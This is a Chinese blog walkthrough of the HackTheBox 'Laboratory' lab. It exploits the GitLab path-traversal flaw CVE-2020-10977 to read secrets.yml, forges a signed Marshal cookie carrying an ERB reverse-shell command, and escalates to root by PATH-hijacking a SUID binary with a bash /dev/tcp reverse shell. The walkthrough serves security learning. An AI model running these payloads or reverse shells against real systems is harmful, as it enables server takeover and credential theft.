HackTheBox - laboratory(CVE-2020-10977)

最新推荐文章于 2022-11-16 13:24:38 发布
最新推荐文章于 2022-11-16 13:24:38 发布
阅读量400 收藏
点赞数
分类专栏: Hack The Box靶机 文章标签: 信息安全 渗透测试 靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44101248/article/details/115755306
版权

image

laboratory

#0 Nmap 收集信息

nmap 10.10.10.26 -p-
根据Nmap的综合扫描来看,有两个域名laboratory.htb和git.laboratory.htb。

─[sg-vip-1]─[10.10.14.33]─[htb-ch1r0n@htb-3c7dulytfv]─[~]
└──╼ [★]$ nmap 10.10.10.216 -p-
Starting Nmap 7.80 ( https://nmap.org ) at 2021-04-16 02:34 UTC
Nmap scan report for laboratory.htb (10.10.10.216)
Host is up (0.0054s latency).
Not shown: 65532 filtered ports
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
443/tcp open  https

Nmap done: 1 IP address (1 host up) scanned in 104.39 seconds
─[sg-vip-1]─[10.10.14.33]─[htb-ch1r0n@htb-3c7dulytfv]─[~]
└──╼ [★]$ nmap 10.10.10.216 -p22,80,443 -A
Starting Nmap 7.80 ( https://nmap.org ) at 2021-04-16 02:38 UTC
Nmap scan report for laboratory.htb (10.10.10.216)
Host is up (0.0026s latency).

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http     Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to https://laboratory.htb/
443/tcp open  ssl/http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: The Laboratory
| ssl-cert: Subject: commonName=laboratory.htb
| Subject Alternative Name: DNS:git.laboratory.htb
| Not valid before: 2020-07-05T10:39:28
|_Not valid after:  2024-03-03T10:39:28
| tls-alpn: 
|_  http/1.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.08 seconds

在laboratory.htb翻找一番并未发现有利用的东西。常规操作扫目录、查看页面信息都没收获。
唯一有价值就是三个“用户名”

 

#1 漏洞利用 CVE-2020-10977(LFI)

接着就是到git.laboratory.htb,打开发现是gitlab服务

到attackerkb上搜索公开漏洞,发现有个LFI-RCE,漏洞编号CVE-2020-10977;

注册账号后根据漏洞复现文章进行漏洞复现,创建两个Projects
参考:https://www.freesion.com/article/17771419587/

再其中一个issues中加入payload

![a](/uploads/11111111111111111111111111111111/../../../../../../../../../../../../../../opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml)

移动到另外一个Projects中

成功获得目标机器的secrets.yml,获取secret_key_base

攻击机上安装gitlab,安装步骤可按照上面的参考。
安装完依次输入两条命令启动gitlab。(需要些时间)
gitlab-ctl reconfigure
gitlab-ctl restart

将secrets.yml替换到攻击机的/opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml
sudo cp secrets.yml /opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml

#2 漏洞利用 CVE-2020-10977(RCE)

替换完后启动
gitlab-rails console
执行以下命令,主要修改ip和port

request = ActionDispatch::Request.new(Rails.application.env_config)
request.env["action_dispatch.cookies_serializer"] = :marshal
cookies = request.cookie_jar
erb = ERB.new("<%= `bash -c 'bash -i >&/dev/tcp/10.10.14.33/8888 0>&1'` %>")
depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(erb, :result, "@result", ActiveSupport::Deprecation.new)
cookies.signed[:cookie] = depr
puts cookies[:cookie]

获得cookie后将cookie复制到curl中

curl -vvv 'https://git.laboratory.htb/users/sign_in' -b "experimentation_subject_id=BAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQk6DkBpbnN0YW5jZW86CEVSQgs6EEBzYWZlX2xldmVsMDoJQHNyY0kiYCNjb2Rpbmc6VVRGLTgKX2VyYm91dCA9ICsnJzsgX2VyYm91dC48PCgoIGBlY2hvIGZsYWcgd2FzIGhlcmUgPiAvdG1wL2ZsYWdgICkudG9fcyk7IF9lcmJvdXQGOgZFRjoOQGVuY29kaW5nSXU6DUVuY29kaW5nClVURi04BjsKRjoTQGZyb3plbl9zdHJpbmcwOg5AZmlsZW5hbWUwOgxAbGluZW5vaQA6DEBtZXRob2Q6C3Jlc3VsdDoJQHZhckkiDEByZXN1bHQGOwpUOhBAZGVwcmVjYXRvckl1Oh9BY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbgAGOwpU--cb4149c7d5749262ab9d2f2072628501ab59ef9b" -k

攻击机起监听后,发送curl请求,将shell弹回到攻击机上

#3 USER Flag

接着在攻击机上启用gitlab-rails console
寻找其他用户

user = User.find(1) 
user.password = 'password1' 
user.password_confirmation = 'password1' 
user.save

找到dexter用户,他是公司的CEO。
结果显示为true表示修改成功。

gitlab登录到该用户找下是否有可利用的线索。
找到一个id_rsa私钥直接将私钥复制下来。

利用私钥进行登录,权限要设置成600
chmod 600 id_rsa
成功获得user的flag

#4 ROOT Flag

查看有SUID权限的文件
find -perm -4000 2>/dev/null
这里有个docker-security 比较可疑,直接查看一下,隐约能看到执行了两次chmod命令
我们可以使用环境变量提权
参考:https://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/

创建个chmod,修改环境变量。

dexter@laboratory:~$ nano /tmp/chmod
dexter@laboratory:~$ cat /tmp/chmod 
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.33/33333 0>&1
dexter@laboratory:~$ chmod +x /tmp/chmod 
dexter@laboratory:~$ PATH=/tmp:$PATH docker-security

攻击机开启监听,成功弹回shell。获得root flag
收工!

参考链接:

CVE-2020-10977复现

环境变量提权

z4yn:)
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
GitLab任意文件读取漏洞复现(CVE-2020-10977)
m0_48520508的博客
12-30 2183
0x00简介 GitLab 是一个用于仓库管理系统的开源项目,使用Git作为代码管理工具,并在此基础上搭建起来的web服务。GitLab是由GitLabInc.开发,使用MIT许可证的基于网络的Git仓库管理工具,且具有wiki和issue跟踪功能。使用Git作为代码管理工具,并在此基础上搭建起来的web服务。 0x01漏洞概述 在Gitlab 8.5-12.9版本中,存在一处任意文件读取漏洞,攻击者可以利用该漏洞,在不需要特权的状态下,读取任意文件,造成严重信息泄露,从而导致进一步被攻击的风险。 0x02
CVE-2020-10977-Gitlab RCE 任意文件读取导致远程命令执行漏洞-环境搭建及完整复现-exp-图文详细笔记
weixin_43311457的博客
10-29 3030
Gitlab任意文件读取导致远程命令执行 漏洞环境搭建-Centos7 1.安装依赖软件 yum -y install policycoreutils openssh-server openssh-clients postfix 2.设置postfix开机自启,并启动,postfix支持gitlab发信功能(对漏洞环境应该不重要) systemctl enable postfix && systemctl start postfix 3.下载gitlab安装包,然后安装 官方下载: CE
php目录穿越漏洞攻击,GitLab任意文件读取漏洞CVE-2020-10977
weixin_35652131的博客
03-24 292
2020年4月28日,GitLab的一个任意文件读取漏洞的漏洞细节被公开。该漏洞补丁于2020年3月26号由GitLab官方发布。相关组件介绍GitLab 是一个用于仓库管理系统的开源项目,使用Git作为代码管理工具,并在此基础上搭建起来的web服务。GitLab是由GitLabInc.开发,使用MIT许可证的基于网络的Git仓库管理工具,且具有wiki和issue跟踪功能。漏洞分析当GitLab...
GitLab任意文件读取漏洞CVE-2020-10977重现
cumt_TTR的专栏
11-27 1974
漏洞描述 地址: https://www.freebuf.com/vuls/235982.html Gitlab安装 官方地址: https://docs.gitlab.com/omnibus/docker/ 启动docker: 注意版本号,不要用最新版本,这个漏洞是有相关版本的 docker run --detach \ --hostname 192.168.1.22 \ --publish 9443:443 --publish 980:80 --publish 922:22 \ -
Gitlab任意文件读取漏洞(cve-2020-10977
weixin_45006525的博客
04-27 2526
Gitlab任意文件读取漏洞(cve-2020-10977) 简介: GitLab 是一个用于仓库管理系统的开源项目,使用Git作为代码管理工具,并在此基础上搭建起来的web服务。GitLab是由GitLabInc.开发,使用MIT许可证的基于网络的Git仓库管理工具,且具有wiki和issue跟踪功能。 在Gitlab 8.5-12.9版本中,存在一处任意文件读取漏洞,攻击者可以利用该漏洞,在不需要特权的状态下,读取任意文件,造成严重信息泄露,从而导致进一步被攻击的风险。 ...
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络...
CVE-2020-35728:CVE-2020-35728 和 Jackson-databind RCE
05-31
描述 2.9.10.8 之前的 FasterXML jackson-databind 2.x 错误处理了与 ... web/javax.servlet.jsp.jstl)。 如何RCE pom.xml <?xml version="1.0" encoding="UTF-8"?>...
CVE_2020_2546:CVE-2020-2546,CVE-2020-2915 CVE-2020-2801 CVE-2020-2798 CVE-2020-2883 CVE-2020-2884 CVE-2020-2950 WebLogic T3有效负载利用poc python3,
03-20
推特: 1,Weblogic RCE漏洞利用CVE_2020_2546 CVE-2020-2915 CVE-2020-2801 CVE-2020-2798 CVE-2020-2883 CVE-2020-2884 CVE-2020-2950 WebLogic RCE T3有效载荷利用POC python3 2,利用GIOP +发送绑定(CVE-2020-...
cve-2020-2551_poc.py
03-12
cve-2020-2551_poc.py
GitLab任意文件读取漏洞(CVE-2020-10977)POC
01-15
检测脚本
CVE-2020-10977:Gitlab v12.4.0-8.1 RCE
05-07
亚搏体育app v12.4.0-12.8.1 RCE 完全基于 ,这对我不起作用,HTML解析的内容似乎很麻烦,因此我将其重写为js。 用法 以通常的方式启动反向shell处理程序,然后使用以下命令运行此脚本: TARGET_URI= " https://target " TARGET_EMAIL_DOMAIN= " laboratory.htb " \ TARGET_USER= " test " TARGET_PASSWORD= " Test pass 123 " \ LOCAL_IP= " 10.10.14.142 " LOCAL_PORT= " 44044 " \ node gitlab_rce.js 可以使用TUNNEL_HOST="127.0.0.1" TUNNEL_PORT="8080"指定代理。 Burp在此调试中特别有用。 这是做什么的 检查目标是否达到 如果提
hackthebox注册教程
01-20
官方网址:https://www.hackthebox.eu/ hackthebox是一个靶场,听说和vulnhub很像,最近迷上了做靶场,于是就像去hackthebox看看,发现还是注册,而且注册好像还没有那么简单 在首页的最下面有个join,进行点击 发现需要邀请码,上网搜了搜,发现邀请码得靠自己获取,好吧,我接受这个挑战。 使用view-source:https://www.hackthebox.eu/invite,查看源代码 发现提示 发现可疑的js文件:/js/inviteapi.min.js   inviteapi  邀请接口 查看该js 在控制台进行调用,给出了提示,
HackTheBox:Hack The Box笔测试和挑战
03-08
哈克盒子 Hack The Box笔测试和来自挑战 在这里,我们有Hack The Box的演练。
CVE-2020-21224 ClusterEngineV4.0 远程代码执行.md
04-11
CVE-2020-21224 ClusterEngineV4.0 远程代码执行
GitLab任意文件读取漏洞(CVE-2020-10977)复现
锋刃科技的博客
12-01 3771
漏洞概述 GitLab是美国GitLab公司的一款使用Ruby on Rails开发的、自托管的、Git(版本控制系统)项目仓库应用程序。该程序可用于查阅项目的文件内容、提交历史、Bug列表等。 GitLab(企业版和社区版)12.9之前版本中存在路径遍历漏洞。该漏洞源于网络系统或产品未能正确地过滤资源或文件路径中的特殊元素。攻击者可利用该漏洞访问受限目录之外的位置。 影响版本 GitLab GitLab EE >=8.5,<=12.9 GitLab GitLab C...
CVE-2020-10977 GitLab任意文件读取漏洞复现
akdjfhx的博客
11-16 1486
CVE-2020-10977 GitLab任意文件读取漏洞复现
CVE-2020-10977复现过程
weixin_39811856的博客
11-30 1687
老规矩上一下漏洞详情 漏洞详情: GitLab是美国GitLab公司的一款使用Ruby on Rails开发的、自托管的、Git(版本控制系统)项目仓库应用程序。该程序可用于查阅项目的文件内容、提交历史、Bug列表等。 GitLab(企业版和社区版)12.9之前版本中存在路径遍历漏洞。该漏洞源于网络系统或产品未能正确地过滤资源或文件路径中的特殊元素。攻击者可利用该漏洞访问受限目录之外的位置。 POC: #!/usr/bin/env python3 import sys import jso.
gitlab打不太太慢了_GitLab任意文件读取漏洞复现(CVE202010977)
weixin_39637397的博客
01-11 210
前言在复现该漏洞的过程中,不幸的是搭建环境时出了问题,今年只剩两个半小时了,我怕来不及,因为自己实在接受不了自己复现一个漏洞会花费两年时间(此处流满了菜狗的眼泪),所以就参(照)考(搬)了其他团队的复现过程,参(原)考(文)链接在文末(汪汪汪~)0x00简介GitLab 是一个用于仓库管理系统的开源项目,使用Git作为代码管理工具,并在此基础上搭建起来的web服务。GitLab是由Gi...
weblogic-cve-2020-25516
最新发布
07-25
C知道: 对于您提到的Weblogic漏洞CVE-2020-25516,这是一个已经被公开披露的漏洞,它影响了Oracle WebLogic Server的某些版本。 具体来说,这个漏洞是由于WebLogic Server管理控制台的不当权限验证机制所导致的。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值